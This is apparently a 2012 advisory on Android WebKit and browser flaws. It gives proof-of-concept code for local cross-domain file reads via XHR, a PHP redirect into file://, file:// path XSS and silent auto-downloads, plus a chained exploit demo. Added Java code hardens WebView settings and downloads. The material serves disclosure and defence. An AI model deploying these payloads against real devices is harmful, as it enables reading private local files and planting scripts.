Android Multiple Vulnerabilities

Author: []

Release Date: 2012/2/8


Ph4nt0m Webzine 0x06 has been released with three papers on Android application security, covering the development environment, browser security and inter-application communication, and it also publishes a number of 0days:

[0day-NO.0] android-webkit local cross-domain vulnerability

android-webkit allows a local HTML file to cross into any http domain and to read local files. demo:


var request = false;
if(window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if(request.overrideMimeType) {
        request.overrideMimeType('text/xml');
    }
} else if(window.ActiveXObject) {
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP',
        'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
        'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for(var i=0; i<versions.length; i++) {
        try {
            request = new ActiveXObject(versions[i]);
        } catch(e) {}
    }
}
// synchronous request issued from the local html file; the first target is a local file, the second an http origin
request.open("GET", "file://///default.prop", false);
//request.open("GET", "", false);
request.send(null);
var ret = request.responseText;



[0day-NO.1] android-webkit cross-protocol vulnerability

this vul allows crossing from http to the file protocol. demo:

<iframe name=f src="location.php"></iframe>
<script>
function init(){
    f.location = "file:///default.prop";
}
setTimeout(init, 5000);
</script>

location.php codz:

<?php
header("Location:file:///80vul.com");
?>

[0day-NO.2] The android-webkit file:// protocol xss vulnerability

In android-webkit's file:// protocol handling, directory and file names are not filtered before being rendered, which leads to cross-site scripting. demo:

visit this: file:///80vul.com/<script>alert(1);</script>
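The app-side counterpart to [0day-NO.0] through [0day-NO.2], added here as an example; it is not code from the Ph4nt0m advisory or from the Android project. It assumes an app that embeds a WebView and only needs http(s) content. HardenedWebView and SchemeRestrictingClient are names I chose; the WebSettings and WebViewClient calls are the real Android APIs. The two *FromFileURLs setters only arrived with API 16 (Android 4.1), so on the 1.x to 4.0 builds this advisory covers, the in-app mitigation available at the time was setAllowFileAccess(false) together with never loading file:// content.

```java
import android.annotation.TargetApi;
import android.net.Uri;
import android.os.Build;
import android.webkit.WebResourceRequest;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

/** Example hardening for a WebView that must only show http(s) content (names are mine). */
public final class HardenedWebView {

    private HardenedWebView() {}

    /** Apply the settings that close the file:// origin holes; call before loadUrl(). */
    public static void harden(WebView webView) {
        WebSettings s = webView.getSettings();

        // Primary control: do not load file:// URLs at all. A file:// document that never loads
        // cannot issue the cross-domain XHR of NO.0 or render the unescaped listing of NO.2.
        // (file:///android_asset and file:///android_res stay reachable even with this false.)
        s.setAllowFileAccess(false);
        // content:// URIs are another local source a page should not be able to read.
        s.setAllowContentAccess(false);

        // From API 16: even if a file:// page is loaded, it may neither read other local files
        // nor reach arbitrary http(s) origins via XMLHttpRequest. Absent on the affected builds.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN) {
            s.setAllowFileAccessFromFileURLs(false);
            s.setAllowUniversalAccessFromFileURLs(false);
        }

        // Defence in depth for NO.1: refuse any navigation whose target leaves http/https,
        // including the Location: file:/// redirect that location.php above returns.
        webView.setWebViewClient(new SchemeRestrictingClient());
    }

    /** Blocks navigations to any scheme other than http or https. */
    static final class SchemeRestrictingClient extends WebViewClient {

        static boolean isAllowed(Uri uri) {
            String scheme = uri == null ? null : uri.getScheme();
            return "https".equalsIgnoreCase(scheme) || "http".equalsIgnoreCase(scheme);
        }

        // Returning true tells the WebView not to load the URL.
        @Override
        public boolean shouldOverrideUrlLoading(WebView view, String url) {
            return !isAllowed(Uri.parse(url));
        }

        @TargetApi(Build.VERSION_CODES.N)
        @Override
        public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
            return !isAllowed(request.getUrl());
        }
    }
}
```

The settings, not the client, are the control to rely on: shouldOverrideUrlLoading is not guaranteed to see every navigation (script-driven location changes inside an iframe, as in the demo above, were not reliably reported on the old WebKit-based WebView), whereas a disabled file:// scheme fails no matter how the navigation was started.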

[0day-NO.3] android-browser/firefox auto download the file vulnerability

android-browser/firefox handle Content-Disposition: attachment without any safety prompt, so through this vul a site can make the browser automatically download an evil html file into the local download directory.

test this code:

<?php
header("Content-Disposition: attachment:filename=autodown.htm");
print $data;
?>

the local file name and the path:

android 1.x -> /sdcard/download/autodown.html
android 2.x-3.x -> /sdcard/download/autodown.htm
android 4.0 -> /sdcard/download/autodown.php
firefox -> /sdcard/download/autodown.php
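What an app embedding a WebView can do about [0day-NO.3] on its own side, added here as an example that is not part of the advisory or of any Android component: a DownloadListener that never saves active content silently and keeps everything else out of the shared /sdcard/download directory. GuardedDownloadListener, isActiveContent and the extension list are mine; URLUtil.guessFileName, DownloadManager.Request and setDestinationInExternalFilesDir are real Android APIs. It assumes the app has a UI of its own for asking the user about a blocked download (not shown).

```java
import android.app.DownloadManager;
import android.content.Context;
import android.net.Uri;
import android.os.Environment;
import android.util.Log;
import android.webkit.DownloadListener;
import android.webkit.URLUtil;
import android.webkit.WebView;

import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/** Example policy for downloads a page pushes via Content-Disposition (names are mine). */
public final class GuardedDownloadListener implements DownloadListener {

    private static final String TAG = "GuardedDownload";

    // Extensions that a browser or file:// handler would render as a document and run script from.
    private static final Set<String> ACTIVE_EXTENSIONS = new HashSet<>(Arrays.asList(
            "htm", "html", "xhtml", "xht", "svg", "js", "mht", "mhtml"));

    private final Context context;

    public GuardedDownloadListener(Context context) {
        this.context = context.getApplicationContext();
    }

    /** True when the saved file could execute script if later opened through file://. */
    static boolean isActiveContent(String fileName, String mimeType) {
        String mt = mimeType == null ? "" : mimeType.toLowerCase(Locale.ROOT);
        if (mt.startsWith("text/html") || mt.startsWith("application/xhtml")
                || mt.startsWith("image/svg")) {
            return true;
        }
        int dot = fileName.lastIndexOf('.');
        String ext = dot < 0 ? "" : fileName.substring(dot + 1).toLowerCase(Locale.ROOT);
        return ACTIVE_EXTENSIONS.contains(ext);
    }

    @Override
    public void onDownloadStart(String url, String userAgent, String contentDisposition,
                                String mimeType, long contentLength) {
        // guessFileName applies the header / URL path / MIME fallback order, which is also why
        // the advisory sees autodown.htm on some builds and autodown.php on others.
        String fileName = URLUtil.guessFileName(url, contentDisposition, mimeType);

        if (isActiveContent(fileName, mimeType)) {
            // Never write active content to disk without the user asking for it; hand the
            // decision to the app's own confirmation UI instead (assumed, not shown here).
            Log.w(TAG, "blocked silent download of active content " + fileName + " from " + url);
            return;
        }

        Uri uri = Uri.parse(url);
        String scheme = uri.getScheme();
        if (!"https".equalsIgnoreCase(scheme) && !"http".equalsIgnoreCase(scheme)) {
            Log.w(TAG, "refusing download from non-http scheme: " + url);
            return;
        }

        DownloadManager.Request req = new DownloadManager.Request(uri);
        req.setMimeType(mimeType);
        // App-private external directory: other apps (and a file:// page in a browser) cannot
        // read the file back, unlike the world-readable /sdcard/download listed above.
        req.setDestinationInExternalFilesDir(context, Environment.DIRECTORY_DOWNLOADS, fileName);
        req.setNotificationVisibility(
                DownloadManager.Request.VISIBILITY_VISIBLE_NOTIFY_COMPLETED);

        DownloadManager dm = (DownloadManager) context.getSystemService(Context.DOWNLOAD_SERVICE);
        dm.enqueue(req);
    }

    /** Wire the listener: webView.setDownloadListener(new GuardedDownloadListener(context)). */
    public static void attach(WebView webView, Context context) {
        webView.setDownloadListener(new GuardedDownloadListener(context));
    }
}
```

The extension check matters as much as the MIME check: the advisory shows the saved name being derived from the URL path when the header cannot be parsed, so a server can present text/plain and still land an .htm file on disk if only the MIME type were inspected.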

So, let's play a jigsaw puzzle:

//[0day-NO.1]+[0day-NO.2]
<iframe name=f src="location.php"></iframe>
<script>
function init(){
    f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";
}
setTimeout(init, 5000);
</script>

//[0day-NO.1]+[0day-NO.3]

